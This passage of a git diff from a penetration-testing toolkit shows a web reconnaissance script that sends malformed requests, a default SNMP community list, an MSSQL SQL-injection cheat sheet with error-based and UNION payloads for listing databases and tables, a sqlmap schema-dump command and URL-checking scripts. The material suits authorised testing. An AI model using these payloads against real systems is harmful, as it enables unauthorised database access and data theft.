/ HTTP/3.1", - "Host: {}".format(hostname), - "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", - "Accept: text/html", - "Accept-Language: en-US,en;q=0.5", - "Content-Length: 0", - "Connection: Close", - "", - "" - ] - - request2 = [ - "GET / JUNK/1.1", - "Host: {}".format(hostname), - "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", - "Accept: text/html", - "Accept-Language: en-US,en;q=0.5", - "Content-Length: 0", - "Connection: Close", - "", - "" - ] - - request3 = [ - "GET /%00", - "", - "" - ] - - if logfile: - logfile.write('### Malformed Requests\n\n') - - print magenta('[+] Malformed Request - Invalid HTTP Version number') - if logfile: - logfile.write('#### Invalid HTTP Version number\n\n**Response**\n\n') - - resp1 = socket_request(hostname, request1) - if resp1: - print '{} {}'.format(green('>'), resp1) - if logfile: - logfile.write('```html\n{}\n```\n\n'.format(resp1)) - - print '' - - print magenta('[+] Malformed Request - Invalid Protocol') - if logfile: - logfile.write('#### Invalid Protocol\n\n**Response**\n\n') - - resp2 = socket_request(hostname, request2) - if resp2: - print '{} {}'.format(green('>'), resp2) - if logfile: - logfile.write('```html\n{}\n```\n\n'.format(resp2)) - - print '' - - print magenta('[+] Malformed Request - Null') - if logfile: - logfile.write('#### Null\n\n**Response**\n\n') - - resp3 = socket_request(hostname, request3) - if resp3: - print '{} {}'.format(green('>'), resp3) - if logfile: - logfile.write('```html\n{}\n```\n\n'.format(resp3)) - -########################## - -def check_secureheaders(url, logfile, https): - results = [] - - secureHeaders = { - 'X-Frame-Options':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Frame-Options', - 'X-XSS-Protection':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-XSS-Protection', - 'X-Content-Type-Options':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Content-Type-Options', - 'Content-Security-Policy':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#Content-Security-Policy', - 'X-Permitted-Cross-Domain-Policies':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Permitted-Cross-Domain-Policies' - } - - if https: - secureHeaders.update({ - 'Strict-Transport-Security':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#HTTP_Strict_Transport_Security_.28HSTS.29', - 'Public-Key-Pins':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#Public_Key_Pinning_Extension_for_HTTP_.28HPKP.29' - }) - - - headers = requests.get(url, verify=False).headers - - print magenta('[+] Missing Secure Headers') - if logfile: - logfile.write('### Missing Secure Headers\n\n') - - for h in list(secureHeaders): - if h not in headers: - print '{} {}: {}'.format(green('>'), h, secureHeaders[h]) - if logfile: - logfile.write('* [{}]({})\n'.format(h, secureHeaders[h])) - - if logfile: - logfile.write('\n') - -def find_robotstxt(url, logfile): - txt = requests.get("{}/robots.txt".format(url), verify=False, stream=True).text - - print magenta('[+] Robots.txt') - if logfile: - logfile.write('### Robots.txt\n\n') - - print '{} {}'.format(green('>'), txt) - if logfile: - logfile.write('```\n{}\n```\n\n'.format(txt)) - -def check_cacheheaders(url, logfile): - results = [] - - cacheHeaders = { - 'Cache-control':'no-store', - 'Pragma':'no-cache' - } - - headers = requests.get(url, verify=False).headers - - print magenta('[+] Missing Caching directives') - if logfile: - logfile.write('### Missing caching directives (Cacheable HTTPS response)\n\n') - - for h in list(cacheHeaders): - if h not in headers or headers[h] != cacheHeaders[h]: - print '{} {}: {}'.format(green('>'), h, cacheHeaders[h]) - if logfile: - logfile.write('* [{}]({})\n'.format(h, cacheHeaders[h])) - - if logfile: - logfile.write('\n') - - -if __name__ == '__main__': - - args = parseArgs() - print message - - url = args.url - logs = False - https = False - port = 80 - - if args.logs: - filepath = args.logs - if not filepath.endswith('.md'): - filepath = filepath + '.md' - logs = open(filepath, 'w') - - if 'https' in url: - https = True - - if url.count(":") == 2: - port = url.rsplit(':', 1)[1] - - if '://' not in url: - print red('[-] {}: Invalid url'.format(url)) - sys.exit(1) - - if logs: - logs.write('## Web Application Reconnaissance\n') - logs.write('\n***\n') - logs.write('\n') - - if find_headers(url, logs): - if logs: - logs.write('\n***\n\n') - - print '' - - html = requests.get(url, verify=False).content - - find_title(html, logs) - print '' - if logs: - logs.write('***\n\n') - - find_meta(html, logs) - print '' - if logs: - logs.write('***\n\n') - - find_comments(html, logs) - print '' - if logs: - logs.write('***\n\n') - - malformed_request(url, logs, port, https) - print '' - if logs: - logs.write('***\n\n') - - check_secureheaders(url, logs, https) - print '' - if logs: - logs.write('***\n\n') - - find_robotstxt(url, logs) - print '' - if logs: - logs.write('***\n\n') - - check_cacheheaders(url, logs) - print '' - if logs: - logs.write('***\n\n') +#!/usr/bin/python +# encoding: UTF-8 + +""" + This file is part of PenTestKit + Copyright (C) 2017-2018 @maldevel + https://github.com/maldevel/PenTestKit + + PenTestKit - Useful tools for Penetration Testing. + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + For more see the file 'LICENSE' for copying permission. + +""" + +__author__ = "maldevel" +__copyright__ = "Copyright (c) 2017-2018 @maldevel" +__credits__ = ["maldevel"] +__license__ = "GPLv3" +__version__ = "0.2" +__maintainer__ = "maldevel" + +################################ + +import argparse +import sys +import os +import requests +import socket +import ssl + +from bs4 import BeautifulSoup, Comment +from termcolor import colored +from argparse import RawTextHelpFormatter +from urlparse import urlparse + +################################ + +from requests.packages.urllib3.exceptions import InsecureRequestWarning #remove insecure https warning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) #remove insecure https warning + +################################ + +def yellow(text): + return colored(text, 'yellow', attrs=['bold']) + +def green(text): + return colored(text, 'green', attrs=['bold']) + +def red(text): + return colored(text, 'red', attrs=['bold']) + +def cyan(text): + return colored(text, 'cyan', attrs=['bold']) + +def magenta(text): + return colored(text, 'magenta', attrs=['bold']) + +def blue(text): + return colored(text, 'blue', attrs=['bold']) + +################################ + +message = """ + __ __ _ _____ + \ \ / / | | | __ \ + \ \ /\ / /__| |__ | |__) |___ ___ ___ _ __ + \ \/ \/ / _ \ '_ \| _ // _ \/ __/ _ \| '_ \ + \ /\ / __/ |_) | | \ \ __/ (_| (_) | | | | + \/ \/ \___|_.__/|_| \_\___|\___\___/|_| |_| + + Web Application Reconnaissance | @maldevel + {}: {} +""".format(blue('Version'), green(__version__)) + +########################### + +def parseArgs(): + parser = argparse.ArgumentParser(description=message, formatter_class=RawTextHelpFormatter) + parser.add_argument("-u", "--url", action="store", metavar='URL', dest='url', type=str, + default=None, required=True, + help='The url to scan, e.g. http://example.com, https://example.com, http://192.168.1.1') + parser.add_argument('-o', '--output', action='store', metavar='LOGFILE', dest='logs', type=str, default=None, + help='Log file path') + args = parser.parse_args() + + return args + +########################### + +def find_headers(url, logfile): + + print magenta('[+] Headers') + if logfile: + logfile.write('### Headers\n\n') + + try: + r = requests.head(url, verify=False) + except: + print red("[-] An error has occured: {}.\n".format(sys.exc_info()[0])) + return False + + for key, value in r.headers.items() : + print '{} {}: {}'.format(green('>'), key, value) + if logfile: + logfile.write('* {}: {}\n'.format(key, value)) + + +def find_title(html, logfile): + soup = BeautifulSoup(html, 'lxml') #html5lib + + print magenta('[+] Title') + if logfile: + logfile.write('### Title\n\n') + + title = soup.find('title') + print '{} {}'.format(green('>'), title) + if logfile: + logfile.write('```\n{}\n```\n\n'.format(title)) + + +def find_meta(html, logfile): + soup = BeautifulSoup(html, 'lxml') #html5lib + + print magenta('[+] Meta tags') + if logfile: + logfile.write('### Meta tags\n\n') + + for tag in soup.find_all('meta'): + print '{} {}'.format(green('>'), tag) + if logfile: + logfile.write('```html\n{}\n```\n\n'.format(tag)) + + +def find_comments(html, logfile): + soup = BeautifulSoup(html, 'lxml') #html5lib + + print magenta('[+] HTML Comments') + if logfile: + logfile.write('### HTML Comments\n\n') + + for comment in soup.findAll(text=lambda text:isinstance(text, Comment)): + print '{} {}'.format(green('>'), comment) + if logfile: + logfile.write('```html\n{}\n```\n\n'.format(comment)) + +########################## + +def socket_request(hostname, request, port=80, https=False): + CRLF = "\r\n" + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(5) + + if https: + s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1) + + try: + s.connect((hostname, port)) + except: + print red("[-] An error has occured: {}.\n".format(sys.exc_info()[0])) + return False + + s.send(CRLF.join(request)) + + response = b'' + + buffer = s.recv(4096) + while buffer: + response += buffer + buffer = s.recv(4096) + + header, _, body = response.partition(CRLF + CRLF) + s.close() + + return header + + +def malformed_request(url, logfile, port=80, https = False): + hostname = urlparse(url).hostname + + request1 = [ + "GET / HTTP/3.1", + "Host: {}".format(hostname), + "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", + "Accept: text/html", + "Accept-Language: en-US,en;q=0.5", + "Content-Length: 0", + "Connection: Close", + "", + "" + ] + + request2 = [ + "GET / JUNK/1.1", + "Host: {}".format(hostname), + "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", + "Accept: text/html", + "Accept-Language: en-US,en;q=0.5", + "Content-Length: 0", + "Connection: Close", + "", + "" + ] + + request3 = [ + "GET /%00", + "", + "" + ] + + if logfile: + logfile.write('### Malformed Requests\n\n') + + print magenta('[+] Malformed Request - Invalid HTTP Version number') + if logfile: + logfile.write('#### Invalid HTTP Version number\n\n**Response**\n\n') + + resp1 = socket_request(hostname, request1) + if resp1: + print '{} {}'.format(green('>'), resp1) + if logfile: + logfile.write('```html\n{}\n```\n\n'.format(resp1)) + + print '' + + print magenta('[+] Malformed Request - Invalid Protocol') + if logfile: + logfile.write('#### Invalid Protocol\n\n**Response**\n\n') + + resp2 = socket_request(hostname, request2) + if resp2: + print '{} {}'.format(green('>'), resp2) + if logfile: + logfile.write('```html\n{}\n```\n\n'.format(resp2)) + + print '' + + print magenta('[+] Malformed Request - Null') + if logfile: + logfile.write('#### Null\n\n**Response**\n\n') + + resp3 = socket_request(hostname, request3) + if resp3: + print '{} {}'.format(green('>'), resp3) + if logfile: + logfile.write('```html\n{}\n```\n\n'.format(resp3)) + +########################## + +def check_secureheaders(url, logfile, https): + results = [] + + secureHeaders = { + 'X-Frame-Options':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Frame-Options', + 'X-XSS-Protection':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-XSS-Protection', + 'X-Content-Type-Options':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Content-Type-Options', + 'Content-Security-Policy':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#Content-Security-Policy', + 'X-Permitted-Cross-Domain-Policies':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Permitted-Cross-Domain-Policies' + } + + if https: + secureHeaders.update({ + 'Strict-Transport-Security':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#HTTP_Strict_Transport_Security_.28HSTS.29', + 'Public-Key-Pins':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#Public_Key_Pinning_Extension_for_HTTP_.28HPKP.29' + }) + + + headers = requests.get(url, verify=False).headers + + print magenta('[+] Missing Secure Headers') + if logfile: + logfile.write('### Missing Secure Headers\n\n') + + for h in list(secureHeaders): + if h not in headers: + print '{} {}: {}'.format(green('>'), h, secureHeaders[h]) + if logfile: + logfile.write('* [{}]({})\n'.format(h, secureHeaders[h])) + + if logfile: + logfile.write('\n') + +def find_robotstxt(url, logfile): + txt = requests.get("{}/robots.txt".format(url), verify=False, stream=True).text + + print magenta('[+] Robots.txt') + if logfile: + logfile.write('### Robots.txt\n\n') + + print '{} {}'.format(green('>'), txt) + if logfile: + logfile.write('```\n{}\n```\n\n'.format(txt)) + +def check_cacheheaders(url, logfile): + results = [] + + cacheHeaders = { + 'Cache-control':'no-store', + 'Pragma':'no-cache' + } + + headers = requests.get(url, verify=False).headers + + print magenta('[+] Missing Caching directives') + if logfile: + logfile.write('### Missing caching directives (Cacheable HTTPS response)\n\n') + + for h in list(cacheHeaders): + if h not in headers or headers[h] != cacheHeaders[h]: + print '{} {}: {}'.format(green('>'), h, cacheHeaders[h]) + if logfile: + logfile.write('* [{}]({})\n'.format(h, cacheHeaders[h])) + + if logfile: + logfile.write('\n') + + +if __name__ == '__main__': + + args = parseArgs() + print message + + url = args.url + logs = False + https = False + port = 80 + + if args.logs: + filepath = args.logs + if not filepath.endswith('.md'): + filepath = filepath + '.md' + logs = open(filepath, 'w') + + if 'https' in url: + https = True + + if url.count(":") == 2: + port = url.rsplit(':', 1)[1] + + if '://' not in url: + print red('[-] {}: Invalid url'.format(url)) + sys.exit(1) + + if logs: + logs.write('## Web Application Reconnaissance\n') + logs.write('\n***\n') + logs.write('\n') + + if find_headers(url, logs): + if logs: + logs.write('\n***\n\n') + + print '' + + html = requests.get(url, verify=False).content + + find_title(html, logs) + print '' + if logs: + logs.write('***\n\n') + + find_meta(html, logs) + print '' + if logs: + logs.write('***\n\n') + + find_comments(html, logs) + print '' + if logs: + logs.write('***\n\n') + + malformed_request(url, logs, port, https) + print '' + if logs: + logs.write('***\n\n') + + check_secureheaders(url, logs, https) + print '' + if logs: + logs.write('***\n\n') + + find_robotstxt(url, logs) + print '' + if logs: + logs.write('***\n\n') + + check_cacheheaders(url, logs) + print '' + if logs: + logs.write('***\n\n') diff --git a/skid/README.md b/skid/README.md index 85d5539..aaedeb9 100644 --- a/skid/README.md +++ b/skid/README.md @@ -1,13 +1,13 @@ -## README - -### SKID mode - -``` -chmod a+x -R PenTestKit/grep -chmod a+x -R PenTestKit/live-hosts -chmod a+x -R PenTestKit/generate-scripts-lists -chmod a+x scan-external-ip-range.sh -sudo ./scan-external-ip-range.sh x.x.x.x/yy -``` - ---- +## README + +### SKID mode + +``` +chmod a+x -R PenTestKit/grep +chmod a+x -R PenTestKit/live-hosts +chmod a+x -R PenTestKit/generate-scripts-lists +chmod a+x scan-external-ip-range.sh +sudo ./scan-external-ip-range.sh x.x.x.x/yy +``` + +--- diff --git a/snmp/community.lst b/snmp/community.lst index aa07cd9..e832838 100644 --- a/snmp/community.lst +++ b/snmp/community.lst @@ -1,3 +1,3 @@ -public -private -manager +public +private +manager diff --git a/sqli/mssql.md b/sqli/mssql.md index f713c16..113c609 100644 --- a/sqli/mssql.md +++ b/sqli/mssql.md @@ -1,87 +1,87 @@ -## MSSQL SQLi Guide - -### Get server version - -*Assuming there’s one column:* - -``` -1 UNION SELECT @@version-- -``` - -``` -1' UNION SELECT @@version-- -``` - -``` -1 AND 1=CONVERT(INT,serverproperty('productversion'))-- -``` - -``` -1' AND 1=CONVERT(INT,serverproperty('productversion'))-- -``` - -*** - -### Get current username - -*Assuming there’s one column:* - -``` -1 UNION SELECT user_name()-- -``` - -``` -1' UNION SELECT user_name()-- -``` - -*** - -### Get number of databases - -``` -1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT([name]) AS nvarchar(4000)) FROM [master]..[sysdatabases] )+CHAR(58)+CHAR(58)))-- -``` - -``` -1' AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT([name]) AS nvarchar(4000)) FROM [master]..[sysdatabases] )+CHAR(58)+CHAR(58)))-- -``` - -*** - -### Get database names - -*replace N with a number starting from 1* - - -``` -1 AND 1=CONVERT(INT,db_name(N))-- -``` - -``` -1' AND 1=CONVERT(INT,db_name(N))-- -``` - -*** - -### Get number of tables - -``` -1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT(*) AS nvarchar(4000)) FROM information_schema.TABLES )+CHAR(58)+CHAR(58)))-- -``` - -``` -1' AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT(*) AS nvarchar(4000)) FROM information_schema.TABLES )+CHAR(58)+CHAR(58)))-- -``` - -### Get Table name - -*replace N with a number starting from 1* - -``` -1 AND 1= CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 TABLE_NAME FROM (SELECT DISTINCT top N TABLE_NAME FROM information_schema.TABLES ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC)+CHAR(58)))-- -``` - -``` -1' AND 1= CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 TABLE_NAME FROM (SELECT DISTINCT top N TABLE_NAME FROM information_schema.TABLES ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC)+CHAR(58)))-- -``` - +## MSSQL SQLi Guide + +### Get server version + +*Assuming there’s one column:* + +``` +1 UNION SELECT @@version-- +``` + +``` +1' UNION SELECT @@version-- +``` + +``` +1 AND 1=CONVERT(INT,serverproperty('productversion'))-- +``` + +``` +1' AND 1=CONVERT(INT,serverproperty('productversion'))-- +``` + +*** + +### Get current username + +*Assuming there’s one column:* + +``` +1 UNION SELECT user_name()-- +``` + +``` +1' UNION SELECT user_name()-- +``` + +*** + +### Get number of databases + +``` +1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT([name]) AS nvarchar(4000)) FROM [master]..[sysdatabases] )+CHAR(58)+CHAR(58)))-- +``` + +``` +1' AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT([name]) AS nvarchar(4000)) FROM [master]..[sysdatabases] )+CHAR(58)+CHAR(58)))-- +``` + +*** + +### Get database names + +*replace N with a number starting from 1* + + +``` +1 AND 1=CONVERT(INT,db_name(N))-- +``` + +``` +1' AND 1=CONVERT(INT,db_name(N))-- +``` + +*** + +### Get number of tables + +``` +1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT(*) AS nvarchar(4000)) FROM information_schema.TABLES )+CHAR(58)+CHAR(58)))-- +``` + +``` +1' AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT(*) AS nvarchar(4000)) FROM information_schema.TABLES )+CHAR(58)+CHAR(58)))-- +``` + +### Get Table name + +*replace N with a number starting from 1* + +``` +1 AND 1= CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 TABLE_NAME FROM (SELECT DISTINCT top N TABLE_NAME FROM information_schema.TABLES ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC)+CHAR(58)))-- +``` + +``` +1' AND 1= CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 TABLE_NAME FROM (SELECT DISTINCT top N TABLE_NAME FROM information_schema.TABLES ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC)+CHAR(58)))-- +``` + diff --git a/sqli/sqlmap.md b/sqli/sqlmap.md index 033b99f..dac260d 100644 --- a/sqli/sqlmap.md +++ b/sqli/sqlmap.md @@ -1,14 +1,14 @@ -## SQLmap notes - -### Get database schema - -* Microsoft SQL Server -* Error-base -* POST -* Burp Pro proxy -* Specific database - -```bash -sqlmap -v3 -u https://example.com --method=POST --data="post-request-data" --proxy=http://127.0.0.1:8080 -p --os=Windows --technique=E --dbms="Microsoft SQL Server" --schema --dump-format=CSV -D dbname -``` - +## SQLmap notes + +### Get database schema + +* Microsoft SQL Server +* Error-base +* POST +* Burp Pro proxy +* Specific database + +```bash +sqlmap -v3 -u https://example.com --method=POST --data="post-request-data" --proxy=http://127.0.0.1:8080 -p --os=Windows --technique=E --dbms="Microsoft SQL Server" --schema --dump-format=CSV -D dbname +``` + diff --git a/web/check-urls.py b/web/check-urls.py index 04bbf4c..5ff3edf 100644 --- a/web/check-urls.py +++ b/web/check-urls.py @@ -1,119 +1,119 @@ -#!/usr/bin/python -# encoding: UTF-8 - -""" - This file is part of PenTestKit - Copyright (C) 2017 @maldevel - https://github.com/maldevel/PenTestKit - - PenTestKit - Useful tools for Penetration Testing. - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - - For more see the file 'LICENSE' for copying permission. -""" - -__author__ = "maldevel" -__copyright__ = "Copyright (c) 2017 @maldevel" -__credits__ = ["maldevel"] -__license__ = "GPLv3" -__version__ = "0.1" -__maintainer__ = "maldevel" - -################################ - -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning -requests.packages.urllib3.disable_warnings(InsecureRequestWarning) -import sys -import os -import argparse -from argparse import RawTextHelpFormatter - -################################ - -def check_url(url, proxies, logfile): - try: - r = requests.head(url, proxies=proxies, verify=False) - print("HEAD: {}: {}".format(url, r.status_code)) - logfile.write('HEAD;{};{}\n'.format(url, r.status_code)) - except Exception as ex: - print("HEAD {}: request failed..".format(url)) - logfile.write('HEAD;{};request failed\n'.format(url)) - - try: - r = requests.get(url, proxies=proxies, verify=False) - print("GET: {}: {}".format(url, r.status_code)) - logfile.write('GET;{};{}\n'.format(url, r.status_code)) - except Exception as ex: - print("GET {}: request failed..".format(url)) - logfile.write('GET;{};request failed\n'.format(url)) - - try: - r = requests.post(url, proxies=proxies, verify=False) - print("POST: {}: {}".format(url, r.status_code)) - logfile.write('POST;{};{}\n'.format(url, r.status_code)) - except Exception as ex: - print("POST {}: request failed..".format(url)) - logfile.write('POST;{};request failed\n'.format(url)) - -def check_file_urls(filename, proxies, logfile): - - logfile.write('METHOD;URL;STATUS\n') - with open(filename) as f: - for line in f: - line = line.strip() - - if line: - - url1 = "http://{}".format(line) - url2 = "https://{}".format(line) - - check_url(url1, proxies, logfile) - check_url(url2, proxies, logfile) - - print '' - -if __name__ == '__main__': - - parser = argparse.ArgumentParser(description='{}'.format('Get HTTP response status code for a list of URLs.'), formatter_class=RawTextHelpFormatter) - - parser.add_argument("-f", "--filename", action="store", metavar='FILE', dest='filename', type=str, default=None, required=True, help='File containing urls.') - parser.add_argument("-o", "--output", action="store", metavar='FILE', dest='outputFile', type=str, default='results.csv', required=False, help='File to write results.') - parser.add_argument('-x', '--proxy', action="store", metavar='PROXY', dest='proxy', type=str, default=None, required=True, help='Use proxy (eg. http://127.0.0.1:8080).') - - if len(sys.argv) is 1: - parser.print_help() - sys.exit() - - args = parser.parse_args() - - proxies = { - 'http': args.proxy, - 'https': args.proxy, - } - - print '\n[*] Get HTTP response status code for a list of URLs.' - - if (not os.path.isfile(args.filename)): - print '[-] Please provide an existing file.\n' - sys.exit() - - try: - with open(args.outputFile, 'w') as logfile: - print '\nchecking urls from file {}..\n'.format(args.filename) - check_file_urls(args.filename, proxies, logfile) - - except KeyboardInterrupt: - sys.exit(0) +#!/usr/bin/python +# encoding: UTF-8 + +""" + This file is part of PenTestKit + Copyright (C) 2017 @maldevel + https://github.com/maldevel/PenTestKit + + PenTestKit - Useful tools for Penetration Testing. + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + For more see the file 'LICENSE' for copying permission. +""" + +__author__ = "maldevel" +__copyright__ = "Copyright (c) 2017 @maldevel" +__credits__ = ["maldevel"] +__license__ = "GPLv3" +__version__ = "0.1" +__maintainer__ = "maldevel" + +################################ + +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) +import sys +import os +import argparse +from argparse import RawTextHelpFormatter + +################################ + +def check_url(url, proxies, logfile): + try: + r = requests.head(url, proxies=proxies, verify=False) + print("HEAD: {}: {}".format(url, r.status_code)) + logfile.write('HEAD;{};{}\n'.format(url, r.status_code)) + except Exception as ex: + print("HEAD {}: request failed..".format(url)) + logfile.write('HEAD;{};request failed\n'.format(url)) + + try: + r = requests.get(url, proxies=proxies, verify=False) + print("GET: {}: {}".format(url, r.status_code)) + logfile.write('GET;{};{}\n'.format(url, r.status_code)) + except Exception as ex: + print("GET {}: request failed..".format(url)) + logfile.write('GET;{};request failed\n'.format(url)) + + try: + r = requests.post(url, proxies=proxies, verify=False) + print("POST: {}: {}".format(url, r.status_code)) + logfile.write('POST;{};{}\n'.format(url, r.status_code)) + except Exception as ex: + print("POST {}: request failed..".format(url)) + logfile.write('POST;{};request failed\n'.format(url)) + +def check_file_urls(filename, proxies, logfile): + + logfile.write('METHOD;URL;STATUS\n') + with open(filename) as f: + for line in f: + line = line.strip() + + if line: + + url1 = "http://{}".format(line) + url2 = "https://{}".format(line) + + check_url(url1, proxies, logfile) + check_url(url2, proxies, logfile) + + print '' + +if __name__ == '__main__': + + parser = argparse.ArgumentParser(description='{}'.format('Get HTTP response status code for a list of URLs.'), formatter_class=RawTextHelpFormatter) + + parser.add_argument("-f", "--filename", action="store", metavar='FILE', dest='filename', type=str, default=None, required=True, help='File containing urls.') + parser.add_argument("-o", "--output", action="store", metavar='FILE', dest='outputFile', type=str, default='results.csv', required=False, help='File to write results.') + parser.add_argument('-x', '--proxy', action="store", metavar='PROXY', dest='proxy', type=str, default=None, required=True, help='Use proxy (eg. http://127.0.0.1:8080).') + + if len(sys.argv) is 1: + parser.print_help() + sys.exit() + + args = parser.parse_args() + + proxies = { + 'http': args.proxy, + 'https': args.proxy, + } + + print '\n[*] Get HTTP response status code for a list of URLs.' + + if (not os.path.isfile(args.filename)): + print '[-] Please provide an existing file.\n' + sys.exit() + + try: + with open(args.outputFile, 'w') as logfile: + print '\nchecking urls from file {}..\n'.format(args.filename) + check_file_urls(args.filename, proxies, logfile) + + except KeyboardInterrupt: + sys.exit(0) diff --git a/web/compare-post-data.py b/web/compare-post-data.py index d476d4f..c4ecd26 100644 --- a/web/compare-post-data.py +++ b/web/compare-post-data.py @@ -1,98 +1,98 @@ -#!/usr/bin/python -# encoding: UTF-8 - -""" - This file is part of PenTestKit - Copyright (C) 2017-2018 @maldevel - https://github.com/maldevel/PenTestKit - - PenTestKit - Useful tools for Penetration Testing. - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - - For more see the file 'LICENSE' for copying permission. - -""" - -__author__ = "maldevel" -__copyright__ = "Copyright (c) 2017-2018 @maldevel" -__credits__ = ["maldevel"] -__license__ = "GPLv3" -__version__ = "0.1" -__maintainer__ = "maldevel" - -################################ - -import argparse -import sys -import urlparse - -from argparse import RawTextHelpFormatter - -################################ - -if __name__ == '__main__': - - parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter) - - parser.add_argument("-i1", "--input1", - action="store", - metavar='POST_data', - dest='input1', - type=str, - default=None, - required=True, - help='POST data to compare') - - parser.add_argument("-i2", "--input2", - action="store", - metavar='POST_data', - dest='input2', - type=str, - default=None, - required=True, - help='POST data to compare') - - if len(sys.argv) is 1: - parser.print_help() - sys.exit(1) - - args = parser.parse_args() - - input1_params = urlparse.parse_qs(args.input1, True) - input1_params = set().union(input1_params.keys()) - - input2_params = urlparse.parse_qs(args.input2, True) - input2_params = set().union(input2_params.keys()) - - unique_params = input1_params.union(input2_params) - - params1_not_params2 = list(input1_params - input2_params) - params2_not_params1 = list(input2_params - input1_params) - - print - print "[+] Unique parameters" - print - print ', '.join(unique_params) - - print - print - print "[+] Parameters in input1 and not in input2" - print - print ', '.join(params1_not_params2) - - print - print "[+] Parameters in input2 and not in input1" - print - print ', '.join(params2_not_params1) +#!/usr/bin/python +# encoding: UTF-8 + +""" + This file is part of PenTestKit + Copyright (C) 2017-2018 @maldevel + https://github.com/maldevel/PenTestKit + + PenTestKit - Useful tools for Penetration Testing. + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + For more see the file 'LICENSE' for copying permission. + +""" + +__author__ = "maldevel" +__copyright__ = "Copyright (c) 2017-2018 @maldevel" +__credits__ = ["maldevel"] +__license__ = "GPLv3" +__version__ = "0.1" +__maintainer__ = "maldevel" + +################################ + +import argparse +import sys +import urlparse + +from argparse import RawTextHelpFormatter + +################################ + +if __name__ == '__main__': + + parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter) + + parser.add_argument("-i1", "--input1", + action="store", + metavar='POST_data', + dest='input1', + type=str, + default=None, + required=True, + help='POST data to compare') + + parser.add_argument("-i2", "--input2", + action="store", + metavar='POST_data', + dest='input2', + type=str, + default=None, + required=True, + help='POST data to compare') + + if len(sys.argv) is 1: + parser.print_help() + sys.exit(1) + + args = parser.parse_args() + + input1_params = urlparse.parse_qs(args.input1, True) + input1_params = 